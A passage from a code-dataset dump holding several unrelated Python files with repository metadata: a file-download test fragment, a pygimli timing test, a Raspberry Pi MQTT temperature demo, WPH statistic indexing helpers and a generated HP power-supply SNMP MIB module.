    # Initiating an MPCFile object should allow access to filepath variable
    MPCF = mpcdata.MPCFile(filename)
    # NOTE(review): the attribute is named `filename` but appears to hold a
    # full path — confirm against the MPCFile implementation.
    filepath = MPCF.filename
    assert filepath == expectedfilepath
'''
# Because of the above deletes and that we did NOT download, we expect filepath to still NOT exist
assert not os.path.exists(filepath)
# Calling get_filedata() method should cause the file to come into existence
filedata = MPCF.get_filedata()
assert os.path.exists(filepath)
assert filedata == MPCF.filedata
# The 'leap-seconds.txt' file is expected to contain the string '2272060800' at some point
IN = False
for item in filedata:
if '2272060800' in item:
IN = True
assert IN
# Running MPCF.get_filedata() again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(expectedfilepath)
MPCF = mpcdata.MPCFile(filename)
filedata = MPCF.get_filedata()
modtimeAfter = os.path.getmtime(expectedfilepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
'''
'''
def test_MPCFile_internal():
"""
Want to see the successful return of a filepath & filecontents from MPCFile object
... both when the local file already exists and when it doesn't
This is for some INTERNAL file (i.e. from MPC website)
"""
filename = '?????.txt'
master_type ='internal'
expectedfilepath = os.path.join(params.dirDict[master_type],filename)
# Forcibly delete any local file
try:
os.remove(expectedfilepath)
except OSError:
pass
assert not os.path.exists(expectedfilepath)
# Initiating an MPCFile object should allow access to filepath variable
MPCF = mpcdata.MPCFile(filename)
filepath = MPCF.filename
assert filepath == expectedfilepath
# Because of the above deletes and that we did NOT download, we expect filepath to still NOT exist
assert not os.path.exists(filepath)
# Calling get_filedata() method should cause the file to come into existence
filedata = MPCF.get_filedata()
assert os.path.exists(filepath)
assert filedata == MPCF.filedata
# The 'leap-seconds.txt' file is expected to contain the string '2272060800' at some point
IN = False ; for item in filecontents: if '2272060800' in item: IN = True
assert IN
# Running MPCF.get_filedata() again should just cause a fileread (no download)
modtimeBefore = os.path.getmtime(expectedfilepath)
MPCF = mpcdata.MPCFile(filename)
filedata = MPCF.get_filedata()
modtimeAfter = os.path.getmtime(expectedfilepath)
assert modtimeAfter == modtimeBefore
assert 'leap-seconds' in masterDict
'''
| 32.530864 | 102 | 0.681214 |
795c59f2f9d584f1a8e618f6d2abc9aa870b8914 | 368 | py | Python | tests/basics/testAssemblePerf.py | mjziebarth/gimli | 196ac4d6dd67e0326cccc44a87b367f64051e490 | [
"Apache-2.0"
] | 3 | 2021-07-10T00:56:59.000Z | 2022-02-17T12:43:38.000Z | tests/basics/testAssemblePerf.py | ivek1312/gimli | 5fafebb7c96dd0e04e2616df402fa27a01609d63 | [
"Apache-2.0"
] | null | null | null | tests/basics/testAssemblePerf.py | ivek1312/gimli | 5fafebb7c96dd0e04e2616df402fa27a01609d63 | [
"Apache-2.0"
] | 1 | 2022-03-29T04:28:40.000Z | 2022-03-29T04:28:40.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
pygimli integration function
"""
import pygimli as pg
import numpy as np
def test(N):
    # Build an N x N x N grid and assemble its FEM stiffness matrix,
    # printing timings for each step (pg.tic/pg.toc).
    x = np.linspace(0, 1, N)
    pg.tic()
    mesh = pg.createGrid(x, x, x)
    print(mesh)
    pg.toc()
    A = pg.RSparseMatrix()
    A.fillStiffnessMatrix(mesh)
    pg.toc()


test(20)
#for N in range(10, 1000, 100):
| 14.72 | 33 | 0.581522 |
795c5a1e4a99f841453046ff6c081a6953bc584e | 4,449 | py | Python | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | mqtt/mqtt_subscribe.py | TwilioDevEd/raspberry-pi-prog-wireless-demos | 88b7489038d5fe9750ce19ecfa013a080efa3aa4 | [
"MIT"
] | null | null | null | ##############################################
# Twilio MQTT Demo for Programmable Wireless #
##############################################
from time import sleep
from sys import exit
from smbus import SMBus
import json
import paho.mqtt.client as mqtt
##############################################
# Global variables #
##############################################
# EDIT THESE
MQTT_CLIENT_ID = "SOME_RANDOM_STRING"
MQTT_PUBLISH_TOPIC = "SOME_RANDOM_STRING/info"
MQTT_SUBSCRIBE_TOPIC = "SOME_RANDOM_STRING/state"
MQTT_ADDRESS = "broker.hivemq.com"
MQTT_BROKER_PORT = 1883
MQTT_USERNAME = "YOUR_USERNAME"
MQTT_PASSWORD = "YOUR_PASSWORD"
UNITS = "celsius"
##############################################
# MCP9808 driver #
##############################################
# MCP9808 register map (see the Microchip MCP9808 datasheet).
MCP9808_I2CADDR_DEFAULT = 0x18
MCP9808_REG_CONFIG = 0x01
MCP9808_REG_AMBIENT_TEMP = 0x05
MCP9808_REG_MANUF_ID = 0x06
MCP9808_REG_DEVICE_ID = 0x07


class MCP9808(object):
    """Minimal driver for the MCP9808 I2C ambient temperature sensor."""

    def __init__(self, address=MCP9808_I2CADDR_DEFAULT, bus=None):
        # `bus` is an I2C bus number; when omitted, self.bus stays unset
        # and check()/read() must not be relied on (check() returns False).
        self.address = address
        if bus: self.bus = SMBus(bus)

    def check(self):
        """Return True when the expected Manufacturer/Device IDs read back."""
        # Check we can read correct Manufacturer ID and Device ID values
        try:
            mid_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_MANUF_ID, 2)
            did_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_DEVICE_ID, 2)
            mid_value = (mid_data[0] << 8) | mid_data[1]
            did_value = (did_data[0] << 8) | did_data[1]
            return (mid_value == 0x0054 and did_value == 0x0400)
        except Exception:
            # Was a bare `except:` which also swallowed KeyboardInterrupt
            # and SystemExit; Exception still covers I2C/attribute errors.
            return False

    def read(self):
        """Return the ambient temperature in degrees Celsius (signed)."""
        # Get the ambient temperature
        temp_data = self.bus.read_i2c_block_data(self.address, MCP9808_REG_AMBIENT_TEMP, 2)
        # Scale and convert to signed Celsius value.
        temp_raw = (temp_data[0] << 8) | temp_data[1]
        temp_cel = (temp_raw & 0x0FFF) / 16.0
        if temp_raw & 0x1000: temp_cel -= 256.0
        return temp_cel
##############################################
# The main application code #
##############################################
def on_message(client, userdata, message):
    # MQTT callback: switch the logged temperature units when a JSON
    # payload like {"units": "fahrenheit"} arrives on the subscribed topic.
    global UNITS
    print("Message received ", str(message.payload.decode("utf-8")))
    try:
        msg = json.loads(str(message.payload.decode("utf-8")))
        # Only accept the two supported unit names; ignore anything else.
        if "units" in msg and msg["units"] in ("fahrenheit", "celsius"):
            if UNITS != msg["units"]:
                print("Changing logged units from",UNITS,"to",msg["units"])
                UNITS = msg["units"]
    except:
        # Message probably wasn't JSON
        # NOTE(review): bare except also swallows KeyboardInterrupt —
        # consider narrowing to (ValueError, KeyError).
        pass
def app_loop():
    # Main loop: read the MCP9808 once a minute and publish a JSON reading
    # to the configured MQTT topic. Exits on Ctrl-C or on a sensor error.
    global UNITS
    tx_count = 1
    try:
        # Setup the temperature sensor
        sensor = MCP9808(bus=1)
        sensor_state = sensor.check()
        if sensor_state is False:
            print("[ERROR] No MCP9808 attached")
            exit(1)

        # Main application loop
        while True:
            temp = sensor.read()
            # The sensor reports Celsius; convert when Fahrenheit is wanted.
            if UNITS != "celsius": temp = (temp * 9 / 5) + 32;
            print("{}. Ambient temperature is {:.02f} {}".format(tx_count, temp, UNITS))
            tx_count +=1

            # Craft a message to the cloud
            msg_formatted = json.dumps({
                "device_id": MQTT_CLIENT_ID + "-device",
                "temperature": temp,
                "units": UNITS,
                "shenanigans": "none"
            })

            # Publish the message by MQTT
            client.publish(MQTT_PUBLISH_TOPIC, msg_formatted)

            # Loop every minute
            sleep(60)
    except KeyboardInterrupt:
        print(" MQTT Demo 2 for Programmable Wireless stopped")
    except OSError:
        print("[ERROR] Cannot read sensor, check connection")
##############################################
# Called from the command line #
##############################################
if __name__ == '__main__':
    print ("Starting MQTT Demo 2 for Programmable Wireless")

    # Setup MQTT
    client = mqtt.Client("TWILIO DEMO 2")
    client.username_pw_set(MQTT_USERNAME, password=MQTT_PASSWORD)
    client.connect(MQTT_ADDRESS, MQTT_BROKER_PORT, 60)
    client.loop_start()  # background network thread for the MQTT client

    # Set a target function to process messages from the broker
    # and subscribe to on-topic messages
    client.on_message = on_message
    client.subscribe(MQTT_SUBSCRIBE_TOPIC)

    # Run the main loop
    app_loop()
| 33.704545 | 91 | 0.557204 |
795c5b1d796295ec18835a39cd09dd7784e3fc93 | 3,745 | py | Python | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | 3 | 2021-04-05T12:24:03.000Z | 2022-02-14T22:15:03.000Z | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | null | null | null | tests/wph_quijote/wph_syntheses/sufficient_stat.py | Eralys/pywph_dev | bb864050c73b168c32a59f37ac0aca71ff159aed | [
"BSD-3-Clause"
] | 1 | 2022-02-03T16:44:35.000Z | 2022-02-03T16:44:35.000Z | import torch
from .utils import periodic_dis
def compute_idx_of_sufficient_stat(L, J, dj, dl, dn):
    """Build the index lists describing the sufficient WPH statistics.

    Parameters
    ----------
    L : int
        Number of wavelet orientations (angles are indexed modulo ``2 * L``).
    J : int
        Number of dyadic scales.
    dj : int
        Maximum scale difference ``j2 - j1`` for cross-scale coefficients.
    dl : int
        Maximum periodic angular distance allowed between the two filters
        (applied to the final cross-scale ``k1=0, k2=1`` family).
    dn : int
        Maximum translation count; tapered near the coarsest scales.

    Returns
    -------
    dict
        Keys ``'j1', 'k1', 'ell2', 'j2', 'k2', 'dn1', 'dn2'`` mapped to
        equal-length ``torch.long`` tensors (see ``get_idx_wph``).
    """
    L2 = L * 2
    idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = [], [], [], [], [], [], []
    idx_lists = (idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)

    def max_dn_at(j):
        # Translations are disabled at the coarsest scale and capped at 1
        # on the next-to-coarsest scale (was duplicated inline three times).
        if j == J - 1:
            return 0
        if j == J - 2:
            return min(1, dn)
        return dn

    # Same-scale terms: j1 == j2 with (k1, k2) in {(0, 1), (1, 1), (0, 0)}.
    for j1 in range(J):
        add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 1, 0, 0)
        add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, 0)
        add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 0, 0, 0)
        for n in range(4 * max_dn_at(j1)):
            add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 1, 1, 0, (n + 1))
            add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j1, 0, 0, 0, (n + 1))

    # Cross-scale terms: j1 + 1 <= j2 <= min(j1 + dj, J - 1) with
    # (k1, k2) in {(1, 2**(j2 - j1)), (0, 1)}; k2 > k1 in both families.
    for j1 in range(J):
        for j2 in range(j1 + 1, min(j1 + dj + 1, J)):
            for n in range(4 * max_dn_at(j2)):
                add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 1, 2 ** (j2 - j1), 0, (n + 1))
                add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 0, 1, 0, (n + 1))
            add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, 0, j1, j2, 1, 2 ** (j2 - j1), 0, 0)
            # Only this family explores non-zero angular offsets (up to dl).
            add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, dl, j1, j2, 0, 1, 0, 0)

    print("Total number of coefficient: " + str(len(idx_k2)))
    return get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
def compute_idx_of_sufficient_stat_PS(L, J, dj, dl, dn):
    """Build the reduced (power-spectrum-like) WPH index set.

    Only the diagonal family j1 == j2, k1 == k2 == 1 is generated, with
    translations tapered near the coarsest scales.  Returns the same dict
    of ``torch.long`` tensors as ``get_idx_wph``.
    """
    L2 = 2 * L
    lists = tuple([] for _ in range(7))
    idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = lists
    for j1 in range(J):
        add_k_and_j_and_dn_for_all_ell_in_idx_list(lists, L2, 0, j1, j1, 1, 1, 0, 0)
        # Translations: none at the coarsest scale, at most one at the
        # next-to-coarsest, dn elsewhere.
        if j1 == J - 1:
            max_dn = 0
        elif j1 == J - 2:
            max_dn = min(1, dn)
        else:
            max_dn = dn
        for n in range(1, 4 * max_dn + 1):
            add_k_and_j_and_dn_for_all_ell_in_idx_list(lists, L2, 0, j1, j1, 1, 1, 0, n)
    print("Total number of coefficient: " + str(len(idx_k2)))
    return get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2)
def add_k_and_j_and_dn_for_all_ell_in_idx_list(idx_lists, L2, dl, j1, j2, k1, k2, dn1, dn2):
    """Append one (j1, j2, k1, k2, ell2, dn1, dn2) entry for every
    orientation ``ell2`` in ``range(L2)`` whose periodic distance to 0 is
    at most ``dl``.

    ``idx_lists`` is the tuple ``(idx_j1, idx_j2, idx_k1, idx_k2,
    idx_ell2, idx_dn1, idx_dn2)`` of lists that are mutated in place.
    """
    idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2 = idx_lists
    for ell2 in range(L2):
        if periodic_dis(0, ell2, L2) <= dl:
            idx_j1.append(j1)
            idx_j2.append(j2)
            idx_k1.append(k1)
            idx_k2.append(k2)
            idx_ell2.append(ell2)
            idx_dn1.append(dn1)
            idx_dn2.append(dn2)
def get_idx_wph(idx_j1, idx_j2, idx_k1, idx_k2, idx_ell2, idx_dn1, idx_dn2):
    """Pack the per-field index lists into a dict of ``torch.long`` tensors.

    Returns a dict with keys ``'j1', 'k1', 'ell2', 'j2', 'k2', 'dn1',
    'dn2'``, each a 1-D tensor of the same length as the input lists.
    """
    fields = {
        'j1': idx_j1,
        'k1': idx_k1,
        'ell2': idx_ell2,
        'j2': idx_j2,
        'k2': idx_k2,
        'dn1': idx_dn1,
        'dn2': idx_dn2,
    }
    # Build tensors directly with the target dtype instead of creating a
    # default-dtype tensor and converting it with .type(torch.long).
    return {name: torch.tensor(values, dtype=torch.long) for name, values in fields.items()}
| 39.421053 | 113 | 0.587717 |
795c5bb039808095c69d00d7c52105da832a37d2 | 21,077 | py | Python | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/POWERSUPPLY-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module POWERSUPPLY-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/POWERSUPPLY-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:32:54 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint")
entPhysicalIndex, = mibBuilder.importSymbols("ENTITY-MIB", "entPhysicalIndex")
hpSwitch, = mibBuilder.importSymbols("HP-ICF-OID", "hpSwitch")
SnmpAdminString, = mibBuilder.importSymbols("SNMP-FRAMEWORK-MIB", "SnmpAdminString")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
Bits, IpAddress, Counter64, Counter32, NotificationType, ObjectIdentity, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, MibIdentifier, TimeTicks, Unsigned32, Integer32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "IpAddress", "Counter64", "Counter32", "NotificationType", "ObjectIdentity", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "MibIdentifier", "TimeTicks", "Unsigned32", "Integer32", "Gauge32")
TruthValue, TextualConvention, MacAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "MacAddress", "DisplayString")
hpicfPsMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55))
hpicfPsMIB.setRevisions(('2013-08-20 00:00', '2013-06-13 00:00', '2013-03-07 10:00', '2008-08-27 10:00',))
if mibBuilder.loadTexts: hpicfPsMIB.setLastUpdated('201308200000Z')
if mibBuilder.loadTexts: hpicfPsMIB.setOrganization('HP Networking')
hpicfEntityPs = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1))
class HpicfDcPsIndex(TextualConvention, Unsigned32):
    # Auto-generated pysnmp textual convention: index identifying a
    # power-supply bay, displayed as a decimal number ('d' hint).
    status = 'current'
    displayHint = 'd'
class HpicfDcPsState(TextualConvention, Integer32):
    # Auto-generated pysnmp textual convention: operational state of an
    # internal power supply, enumerated 1..9 (psNotPresent .. psAuxNotPowered).
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9))
    namedValues = NamedValues(("psNotPresent", 1), ("psNotPlugged", 2), ("psPowered", 3), ("psFailed", 4), ("psPermFailure", 5), ("psMax", 6), ("psAuxFailure", 7), ("psNotPowered", 8), ("psAuxNotPowered", 9))
class HpicfXpsConnectionStatus(TextualConvention, Integer32):
    # Auto-generated pysnmp textual convention: connection status of an
    # external power supply (XPS) port, enumerated 0..8.
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6, 7, 8))
    namedValues = NamedValues(("notConnected", 0), ("unavailable", 1), ("available", 2), ("active", 3), ("mismatch", 4), ("notReady", 5), ("overCurrent", 6), ("cannotPower", 7), ("autoDisabled", 8))
class HpicfXpsZoneStatus(TextualConvention, Integer32):
    # Auto-generated pysnmp textual convention: status of an XPS power
    # zone, enumerated 1..5 (notConnected .. inReset).
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
    namedValues = NamedValues(("notConnected", 1), ("notReady", 2), ("faulted", 3), ("powered", 4), ("inReset", 5))
hpicfPsTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1), )
if mibBuilder.loadTexts: hpicfPsTable.setStatus('current')
hpicfPsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1), ).setIndexNames((0, "POWERSUPPLY-MIB", "hpicfPsBayNum"))
if mibBuilder.loadTexts: hpicfPsEntry.setStatus('current')
hpicfPsBayNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 1), HpicfDcPsIndex())
if mibBuilder.loadTexts: hpicfPsBayNum.setStatus('current')
hpicfPsState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 2), HpicfDcPsState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsState.setStatus('current')
hpicfPsFailures = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsFailures.setStatus('current')
hpicfPsTemp = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsTemp.setStatus('current')
hpicfPsVoltageInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 5), SnmpAdminString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsVoltageInfo.setStatus('current')
hpicfPsWattageCur = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsWattageCur.setStatus('current')
hpicfPsWattageMax = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsWattageMax.setStatus('current')
hpicfPsLastCall = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsLastCall.setStatus('current')
hpicfPsModel = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 1, 1, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(1, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfPsModel.setStatus('current')
hpicfXpsTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2), )
if mibBuilder.loadTexts: hpicfXpsTable.setStatus('current')
hpicfXpsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "POWERSUPPLY-MIB", "hpicfXpsConnectingPort"))
if mibBuilder.loadTexts: hpicfXpsEntry.setStatus('current')
hpicfXpsConnectingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hpicfXpsConnectingPort.setStatus('current')
hpicfXpsPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPortOperStatus.setStatus('current')
hpicfXpsSwitchSerialNo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchSerialNo.setStatus('current')
hpicfXpsConnectionState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 4), HpicfXpsConnectionStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsConnectionState.setStatus('current')
hpicfXpsSysName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSysName.setStatus('current')
hpicfXpsMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 6), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsMACAddress.setStatus('current')
hpicfXpsSwitchOSVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchOSVersion.setStatus('current')
hpicfXpsSwitchIpsVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 8), Unsigned32()).setUnits('Volts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchIpsVoltage.setStatus('current')
hpicfXpsSwitchIpsWattage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 9), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchIpsWattage.setStatus('current')
hpicfXpsPower = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 10), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPower.setStatus('current')
hpicfXpsSupportedCableVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSupportedCableVersion.setStatus('current')
hpicfXpsSupportedZoneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSupportedZoneVersion.setStatus('current')
hpicfXpsSwitchModType = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 2, 1, 13), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSwitchModType.setStatus('current')
hpicfXpsSwitchConfigTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3), )
if mibBuilder.loadTexts: hpicfXpsSwitchConfigTable.setStatus('current')
hpicfXpsSwitchConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: hpicfXpsSwitchConfigEntry.setStatus('current')
hpicfXpsSwitchAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enable", 1), ("disable", 2))).clone('enable')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsSwitchAdminStatus.setStatus('current')
hpicfXpsSwitchAutoRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("yes", 1), ("no", 2))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsSwitchAutoRecovery.setStatus('current')
hpicfXpsAllowPortsSupported = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(2, 4))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsAllowPortsSupported.setStatus('current')
hpicfXpsReset = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noReset", 1), ("factoryReset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsReset.setStatus('current')
hpicfXpsType = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsType.setStatus('current')
hpicfXpsSerialNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsSerialNum.setStatus('current')
hpicfXpsModuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsModuleName.setStatus('current')
hpicfXpsPowerShareReqStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("idle", 1), ("inProgress", 2), ("success", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPowerShareReqStatus.setStatus('current')
